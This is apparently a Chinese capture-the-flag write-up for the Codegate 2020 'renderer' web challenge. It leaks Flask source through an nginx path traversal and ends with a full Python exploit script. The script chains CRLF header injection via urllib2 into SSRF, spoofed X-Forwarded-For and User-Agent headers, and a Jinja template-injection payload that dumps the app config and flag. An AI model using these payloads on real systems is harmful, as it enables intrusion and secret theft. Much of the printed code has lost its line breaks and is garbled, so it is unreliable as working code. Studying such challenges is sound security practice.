codegate-2020 renderer

利用nginx配置不当导致的目录遍历漏洞泄漏出文件
http://58.229.253.144/static../src/uwsgi.ini

[uwsgi]
chdir = /home/src
module = run
callable = app
processes = 4
uid = www-data
gid = www-data
socket = /tmp/renderer.sock
chmod-socket = 666
vacuum = true
daemonize = /tmp/uwsgi.log
die-on-term = true
pidfile = /tmp/renderer.pid

http://58.229.253.144/static../cleaner.sh

#!/bin/bashwhile true
dorm /home/tickets/*sleep 3600
done

结合flask目录结构，深挖src目录
https://blog.csdn.net/weixin_44403501/article/details/88733895
http://58.229.253.144/static../src/app/__init__.py
http://58.229.253.144/static../src/app/__init__.py

from flask import Flask
from app import routes #看这一句
import osapp = Flask(__name__)
app.url_map.strict_slashes = False
app.register_blueprint(routes.front, url_prefix="/renderer")
app.config["FLAG"] = os.getenv("FLAG", "CODEGATE2020{}")

看第二句可以继续挖掘
http://58.229.253.144/static../src/app/routes.py

from flask import Flask, render_template, render_template_string, request, redirect, abort, Blueprint
import urllib2
import time
import hashlibfrom os import path
from urlparse import urlparsefront = Blueprint("renderer", __name__)@front.before_request
def test():print(request.url)@front.route("/", methods=["GET", "POST"])
def index():if request.method == "GET":return render_template("index.html")url = request.form.get("url") # 访问该urlres = proxy_read(url) if url else Falseif not res:abort(400)return render_template("index.html", data = res)@front.route("/whatismyip", methods=["GET"])
def ipcheck():return render_template("ip.html", ip = get_ip(), real_ip = get_real_ip())@front.route("/admin", methods=["GET"])
def admin_access():ip = get_ip()rip = get_real_ip()if ip not in ["127.0.0.1", "127.0.0.2"]: #super private ip :)abort(403)if ip != rip: #if use proxyticket = write_log(rip)return render_template("admin_remote.html", ticket = ticket)else:if ip == "127.0.0.2" and request.args.get("body"):ticket = write_extend_log(rip, request.args.get("body"))return render_template("admin_local.html", ticket = ticket)else:return render_template("admin_local.html", ticket = None)@front.route("/admin/ticket", methods=["GET"])
def admin_ticket():ip = get_ip()rip = get_real_ip()if ip != rip: #proxy doesn't allow to show ticketprint 1abort(403)if ip not in ["127.0.0.1", "127.0.0.2"]: #only localprint 2abort(403)if request.headers.get("User-Agent") != "AdminBrowser/1.337":print request.headers.get("User-Agent")abort(403)if request.args.get("ticket"):log = read_log(request.args.get("ticket"))if not log:print 4abort(403)return render_template_string(log)def get_ip():return request.remote_addrdef get_real_ip():return request.headers.get("X-Forwarded-For") or get_ip()def proxy_read(url):#TODO : implement loggings = urlparse(url).schemeif s not in ["http", "https"]: #sjgdmfRk akfRkreturn ""return urllib2.urlopen(url).read()def write_log(rip):tid = hashlib.sha1(str(time.time()) + rip).hexdigest()with open("/home/tickets/%s" % tid, "w") as f:log_str = "Admin page accessed from %s" % ripf.write(log_str)return tiddef write_extend_log(rip, body):tid = hashlib.sha1(str(time.time()) + rip).hexdigest()with open("/home/tickets/%s" % tid, "w") as f:f.write(body)return tiddef read_log(ticket):if not (ticket and ticket.isalnum()):return Falseif path.exists("/home/tickets/%s" % ticket):with open("/home/tickets/%s" % ticket, "r") as f:return f.read()else:return False

import requests
from urllib import parse
import re,os,sys
# ip与代理ip不一致，将X-Forwarder-for写入文件
def write_ticket():url = 'http://110.10.147.169/renderer'payload = """http://127.0.0.1/renderer/admin?a=1""" + \" HTTP/1.1\r\n"+\"X-Forwarded-For: 127.0.0.2{
    {config.items()}}\r\n" +\"Header2: x\r\n"data = {
    'url':payload}r = requests.post(url=url,data=data)res = re.findall("[a-f0-9]{40}",r.text)if res:ticket_number = res[0]print (ticket_number)return ticket_numberelse:return Nonedef check(ticket):url = 'http://110.10.147.169/renderer'payload = "http://127.0.0.1/static../tickets/" + ticket + \" HTTP/1.1\r\n"+\"Header2: x\r\n"data = {
    'url':payload}r = requests.post(url=url,data=data)print (r.text)def read_flag(ticket):url = 'http://110.10.147.169/renderer'payload = """http://127.0.0.1/renderer/admin/ticket?ticket=""" + ticket+ \" HTTP/1.1\r\n"+\"User-Agent: AdminBrowser/1.337\r\n"+\"Host: *\r\n" +\"X-Forwarded-For: 127.0.0.1\r\n\r\n" +\"Header2: x\r\n"print (payload)data = {
    'url':payload}r = requests.post(url=url,data=data)print (r.text)if __name__ == '__main__':# 第一步 利用write_extend_log 将payload写入ticketsticket = write_ticket()# 第二步 查看是否真的写入check(ticket)# 读取文件read_flag(ticket)